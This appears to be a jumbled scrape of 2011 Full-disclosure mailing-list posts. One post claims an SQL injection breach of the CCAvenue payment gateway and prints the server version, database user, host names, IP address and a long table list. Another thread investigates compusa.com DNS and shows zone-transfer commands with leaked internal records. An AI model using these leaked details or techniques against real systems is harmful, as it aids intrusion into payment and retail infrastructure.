DB_SCHEMA [ TABLES: 87 ] : Deprecated_Payment_Invoice [ TABLES: 88 ] : Deprecated_Payment_Invoice_Logs [ TABLES: 89 ] : Dr_Cr_Notes [ TABLES: 90 ] : dtproperties [ TABLES: 91 ] : dummy_shopper_details [ TABLES: 92
Re: [Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
[ + ] Date: Wed May 3 04:47:33 2011 ... -- Kindly disregard the previous report. I got the date all mixed up. hah! You must be joking right! Also where exactly was the *hidden SQL injection you said?? Cmon! come out clean about the source... Thanks, :) d3hydr8 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WTF
On Fri, May 6, 2011 at 6:49 PM, Gustavo gustavorober...@gmail.com wrote: WTF ? notebook:~$ ping www.compusa.com PING bh.georedirector.akadns.net (127.0.0.1) 56(84) bytes of data. 64 bytes from localhost.localdomain (127.0.0.1): icmp_req=1 ttl=64 time=0.019 ms Same here ... this time on Windows : F:\ping www.compusa.com Pinging bh.georedirector.akadns.net [127.0.0.1] with 32 bytes of data: Reply from 127.0.0.1: bytes=32 time1ms TTL=128 Reply from 127.0.0.1: bytes=32 time1ms TTL=128 Reply from 127.0.0.1: bytes=32 time1ms TTL=128 Reply from 127.0.0.1: bytes=32 time1ms TTL=128 Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms F:\nslookup www.compusa.com Server: Address: 9 Non-authoritative answer: Name:bh.georedirector.akadns.net Address: 127.0.0.1 Aliases: www.compusa.com, compusa.syx.com.akadns.net Normally I'd say that's a DNS config screwup, which would make them unreachable (since their website is not on my system). However, Google seems to be able to reach them if you use the site preview option in the search results : http://www.google.com/search?q=www.compusa.com Curious. Relevant: http://forums.opendns.com/comments.php?DiscussionID=9721 Nick -- Leave the Olympics in Greece, where they belong. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
** (+) Authors : d3hydr8 (+) WebSite : darkode.com (+) Date : 06.05.2011 (+) Hour : 08:21 AM (+) Targets : CCAvenue.com (Payment Gateway) (+) Document: ESA.int Full Disclosure (UPDATED) (+) Method : Hidden SQL Injection ** [ + ] Date: Tue May 3 04:47:33 2011 [ + ] Displaying information about MSSQL host ! [ + ] @@VERSION : Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) [ + ] USER () : iusr_ccavenueiusr_ccavenue [ + ] S_USER () : iusr_ccavenue [ + ] DB_NAME () : gateway [ + ] HOST_NAME () : AV-2 [ + ] SERVER_NAME () : AVDB-3 [ + ] SERVER_TYPE () : Apache/2.2.14 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 [ + ] X-POWERED-By () : Servlet 2.5; JBoss-5.0/JBossWeb-2.1 [ + ] IP_ADDRESS_INFO : 124.153.83.27 -- [ + ] Displaying list of databases on this MSSQL host ! [ DATABASE: 0 ] : gateway [ DATABASE: 1 ] : master [ DATABASE: 2 ] : tempdb [ DATABASE: 3 ] : model [ DATABASE: 4 ] : msdb [ DATABASE: 5 ] : Reseller - [ DATABASE: 0 ] : gateway [ + ] Displaying Tables inside DB: [ TABLES: 0 ] : addl_merchant_details [ TABLES: 1 ] : admin_details [ TABLES: 2 ] : Admn_dept_roles [ TABLES: 3 ] : Admn_depts [ TABLES: 4 ] : Admn_prvlg_grps [ TABLES: 5 ] : Admn_prvlgs [ TABLES: 6 ] : Admn_role_prvlgs [ TABLES: 7 ] : Admn_roles [ TABLES: 8 ] : Admn_user_prvlgs [ TABLES: 9 ] : Admn_users [ TABLES: 10 ] : amex_cc_details [ TABLES: 11 ] : AMEX_CCDETAILS [ TABLES: 12 ] : amex_mer_details [ TABLES: 13 ] : amtShopperCart [ TABLES: 14 ] : amtShopperCart_MMT [ TABLES: 15 ] : auctionPayment [ TABLES: 16 ] : Auto_cancel [ TABLES: 17 ] : Bop_bank [ TABLES: 18 ] : callcenter_user_login_history [ TABLES: 19 ] : ccav_default_charges [ TABLES: 20 ] : Ccav_genid [ TABLES: 21 ] : Ccav_links [ TABLES: 22 ] : ccav_merchant_options [ TABLES: 23 ] : ccav_payout_allocated_keys [ TABLES: 24 ] : ccav_payout_credit_logs [ TABLES: 25 ] : ccav_payout_credits [ TABLES: 26 ] : ccav_payout_credits_realtime_ [ TABLES: 27 ] : ccav_payout_debits [ TABLES: 28 ] : ccav_payout_debits_realtime_bkp [ TABLES: 29 ] : ccav_payout_details [ TABLES: 30 ] : ccav_payout_details_10MAY2010 [ TABLES: 31 ] : ccav_payout_details_10OCT2010 [ TABLES: 32 ] : ccav_payout_details_12AUG2010 [ TABLES: 33 ] : ccav_payout_details_temp [ TABLES: 34 ] : ccav_payout_summaries_10MAY2010 [ TABLES: 35 ] : ccav_payout_summaries_10OCT2010 [ TABLES: 36 ] : ccav_payout_summaries_12AUG2010 [ TABLES: 37 ] : ccav_payout_summaries_temp [ TABLES: 38 ] : ccav_pending_authorizations [ TABLES: 39 ] : ccav_pending_authorizations_20100918 [ TABLES: 40 ] : ccav_pending_authorizations_20100924 [ TABLES: 41 ] : ccav_recon_sheets [ TABLES: 42 ] : ccav_recon_sheets_20100918 [ TABLES: 43 ] : ccav_recon_sheets_20100924 [ TABLES: 44 ] : Ccav_sms_providers [ TABLES: 45 ] : CCAV_tracking_ids [ TABLES: 46 ] : CCAV_tracking_ids_20100918 [ TABLES: 47 ] : ccav_tracking_ids_20100924 [ TABLES: 48 ] : ccav_trans_status_logs [ TABLES: 49 ] : CCAV_transactions [ TABLES: 50 ] : CCAV_transactions_20100918 [ TABLES: 51 ] : ccav_transactions_20100924 [ TABLES: 52 ] : CCAV_transactions_logs [ TABLES: 53 ] : CCAV_transactions_logs_20100918 [ TABLES: 54 ] : ccav_transactions_logs_20100924 [ TABLES: 55 ] : ccav_transactions_realtime_bkp [ TABLES: 56 ] : ccavenue_scheduler_logs [ TABLES: 57 ] : centurion_debit [ TABLES: 58 ] : Chrc_contact_dets [ TABLES: 59 ] : Chrc_contact_dets_20100918 [ TABLES: 60 ] : Chrc_feedback_dets [ TABLES: 61 ] : Chrc_feedback_dets_20100918 [ TABLES: 62 ] : Chrc_reasons [ TABLES: 63 ] : Chrc_reasons_20100918 [ TABLES: 64 ] : Chrc_srch_dets [ TABLES: 65 ] : Chrc_srch_dets_20100918 [ TABLES: 66 ] : Citi_TxtLog_Child [ TABLES: 67 ] : Citi_TxtLog_Parent [ TABLES: 68 ] : citibank_cc_details [ TABLES: 69 ] : citibank_log [ TABLES: 70 ] : citibank_wkey [ TABLES: 71 ] : COMMISSION [ TABLES: 72 ] : Commission_log [ TABLES: 73 ] : countries [ TABLES: 74 ] : country [ TABLES: 75 ] : country_ip [ TABLES: 76 ] : cpa_20100924 [ TABLES: 77 ] : crs_20100924 [ TABLES: 78 ] : ct_20100918 [ TABLES: 79 ] : ct_20100924 [ TABLES: 80 ] : ct_20101005 [ TABLES: 81 ] : ctl_20100924 [ TABLES: 82 ] : custShopCart [ TABLES: 83 ] : custShopCart_20100918 [ TABLES: 84 ] : custshopcart_20100924 [ TABLES: 85 ] : custShopperCart [ TABLES: 86 ] : DB_SCHEMA [ TABLES: 87 ] : Deprecated_Payment_Invoice [ TABLES: 88 ] : Deprecated_Payment_Invoice_Logs [ TABLES: 89 ] : Dr_Cr_Notes [ TABLES: 90 ] : dtproperties [ TABLES: 91 ] : dummy_shopper_details [ TABLES:
Re: [Full-disclosure] WTF
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 05/06/2011 11:15 PM, Nick Boyce wrote: On Fri, May 6, 2011 at 6:49 PM, Gustavo gustavorober...@gmail.com wrote: WTF ? notebook:~$ ping www.compusa.com PING bh.georedirector.akadns.net (127.0.0.1) 56(84) bytes of data. 64 bytes from localhost.localdomain (127.0.0.1): icmp_req=1 ttl=64 time=0.019 ms Same here ... this time on Windows : F:\ping www.compusa.com Pinging bh.georedirector.akadns.net [127.0.0.1] with 32 bytes of data: Reply from 127.0.0.1: bytes=32 time1ms TTL=128 Reply from 127.0.0.1: bytes=32 time1ms TTL=128 Reply from 127.0.0.1: bytes=32 time1ms TTL=128 Reply from 127.0.0.1: bytes=32 time1ms TTL=128 Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms F:\nslookup www.compusa.com Server: Address: 9 Non-authoritative answer: Name: bh.georedirector.akadns.net Address: 127.0.0.1 Aliases: www.compusa.com, compusa.syx.com.akadns.net Normally I'd say that's a DNS config screwup, which would make them unreachable (since their website is not on my system). However, Google seems to be able to reach them if you use the site preview option in the search results : http://www.google.com/search?q=www.compusa.com Curious. Relevant: http://forums.opendns.com/comments.php?DiscussionID=9721 Nick -- Leave the Olympics in Greece, where they belong. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ About dns ;; ADDITIONAL SECTION: ns01.highspeedbackbone.net. 240003 INA199.181.77.21 ns02.highspeedbackbone.net. 240003 INA199.181.78.22 ns03.highspeedbackbone.net. 240003 INA199.181.77.23 ns04.highspeedbackbone.net. 240003 INA199.181.78.24 testing one by one ... [ksha@warbof ~]$ dig compusa.com @199.181.77.21 AXFR ; DiG 9.8.0 compusa.com @199.181.77.21 AXFR ;; global options: +cmd ; Transfer failed. [ksha@warbof ~]$ dig compusa.com @199.181.78.22 AXFR ; DiG 9.8.0 compusa.com @199.181.78.22 AXFR ;; global options: +cmd ; Transfer failed. [ksha@warbof ~]$ dig compusa.com @199.181.77.23 AXFR ; DiG 9.8.0 compusa.com @199.181.77.23 AXFR ;; global options: +cmd ; Transfer failed. and the last allow zone transfer. compusa.com.86400INSOAns03.highspeedbackbone.net. hostmaster.highspeedbackbone.net. 2008134189 10800 3600 604800 3600 compusa.com.86400INTXTv=spf1 ip4:206.191.131.0/24 mx -all compusa.com.86400INMX10 mail.highspeedbackbone.net. compusa.com.86400INNSns01.highspeedbackbone.net. compusa.com.86400INNSns02.highspeedbackbone.net. compusa.com.86400INNSns03.highspeedbackbone.net. compusa.com.86400INNSns04.highspeedbackbone.net. compusa.com.900INA206.181.131.221 compusa.com.900INA206.181.131.220 nap.miadk._domainkey.compusa.com. 5 INTXTt=y\; p=MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAJ5YnwXcWzCFY6fvQ1Gd6tzI97rvvOw9PVjoekWbja1reGBMfjJ+rfwsJCQavPadAUAKbs46KUDubUgcmwe1oU9abJ3APStwgcxMXlWfvlhuSXmyDHG+HQAIrk0PsR7BBwIDAQAB\; nap.miadkim._domainkey.compusa.com. 5 IN TXTv=DKIM1\; t=y:s\; p=MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAJ5YnwXcWzCFY6fvQ1Gd6tzI97rvvOw9PVjoekWbja1reGBMfjJ+rfwsJCQavPadAUAKbs46KUDubUgcmwe1oU9abJ3APStwgcxMXlWfvlhuSXmyDHG+HQAIrk0PsR7BBwIDAQAB\; _sip._tls.compusa.com.300INSRV0 0 443 sip.compusa.com. answers.compusa.com.86400INCNAME web220.highspeedbackbone.net. autodiscover.compusa.com. 300INA10.100.100.108 community.compusa.com.86400INCNAME web220.highspeedbackbone.net. comp.compusa.com.900INA206.181.131.89 comp.compusa.com.900INA206.181.131.49 dubdubdub.compusa.com.60INCNAME www.compusa.com.edgekey.net. forums.compusa.com.86400INCNAME web220.highspeedbackbone.net. help.compusa.com.86400INNSns02.highspeedbackbone.net. help.compusa.com.86400INNSns01.highspeedbackbone.net. images.compusa.com.86400INCNAME images.compusa.com.edgesuite.net. m.compusa.com.300INCNAMEcompusa.com.velocitude.mobi. media.compusa.com.900INA206.181.131.89 media.compusa.com.900INA206.181.131.49 news.compusa.com.86400INA74.81.68.187 origin-images.compusa.com. 900INA206.181.131.89 origin-images.compusa.com. 900INA206.181.131.49 origin-www.compusa.com.60INA206.191.131.54 origin-www.compusa.com.60INA206.191.131.14 retail.compusa.com.600INA10.101.132.194 reviews.compusa.com.86400INCNAME web220.highspeedbackbone.net. sip.compusa.com.300INA